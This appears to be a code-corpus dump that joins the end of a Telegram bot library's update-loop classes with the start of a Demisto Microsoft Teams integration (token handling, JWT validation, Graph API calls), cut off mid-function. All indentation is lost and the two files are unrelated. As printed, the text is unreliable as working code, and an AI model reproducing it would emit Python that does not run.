:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`.getUpdates`,
controlling which types of updates to receive.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
collectloop = CollectLoop(self._handle)
updatesloop = GetUpdatesLoop(self._bot,
lambda update:
collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
# feed events to collect loop
self._bot.scheduler.on_event(collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
updatesloop.run_as_thread(*args, **kwargs)
collectloop.run_forever() # blocking
class Webhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
def run_forever(self):
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._collectloop.run_forever()
def feed(self, data):
update = _dictify(data)
self._collectloop.input_queue.put(_extract_message(update)[1])
class Orderer(RunForeverAsThread):
def __init__(self, on_ordered_update):
self._on_ordered_update = on_ordered_update
self._inqueue = queue.Queue()
@property
def input_queue(self):
return self._inqueue
def run_forever(self, maxhold=3):
def handle(update):
self._on_ordered_update(update)
return update['update_id']
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
update = self._inqueue.get(block=True, timeout=qwait)
if max_id is None:
# First message received, handle regardless.
max_id = handle(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = handle(update)
# clear contagious updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contagious updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id']-max_id-1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = handle(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
if qwait < 0:
qwait = 0
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
class OrderedWebhook(RunForeverAsThread):
def __init__(self, bot, handle=None):
self._bot = bot
self._collectloop = CollectLoop(_infer_handler_function(bot, handle))
self._orderer = Orderer(lambda update:
self._collectloop.input_queue.put(_extract_message(update)[1]))
# feed messages to collect loop
def run_forever(self, *args, **kwargs):
"""
:type maxhold: float
:param maxhold:
The maximum number of seconds an update is held waiting for a
not-yet-arrived smaller ``update_id``. When this number of seconds
is up, the update is delivered to the message-handling function
even if some smaller ``update_id``\s have not yet arrived. If those
smaller ``update_id``\s arrive at some later time, they are discarded.
Calling this method will block forever. Use :meth:`.run_as_thread` to
run it non-blockingly.
"""
# feed events to collect loop
self._bot.scheduler.on_event(self._collectloop.input_queue.put)
self._bot.scheduler.run_as_thread()
self._orderer.run_as_thread(*args, **kwargs)
self._collectloop.run_forever()
def feed(self, data):
"""
:param data:
One of these:
- ``str``, ``unicode`` (Python 2.7), or ``bytes`` (Python 3, decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
"""
update = _dictify(data)
self._orderer.input_queue.put(update)
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
ENTRY_FOOTER: str = 'From Microsoft Teams'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError('Team member was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
"""
A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
:param method: any restful method
:param url: URL to query
:param json_: HTTP JSON body
:param api: API to query (graph/bot)
:return: requests.json()
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel returns 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
api_health_human_readble: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results(api_health_human_readble + mirrored_channels_human_readable)
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = demisto.getIntegrationContext()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
demisto.setIntegrationContext(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = demisto.getIntegrationContext()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
"""
Retrieves list of AAD users
:return: List of AAD users
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
users: dict = cast(Dict[Any, Any], http_request('GET', url))
return users.get('value', [])
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = demisto.getIntegrationContext()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
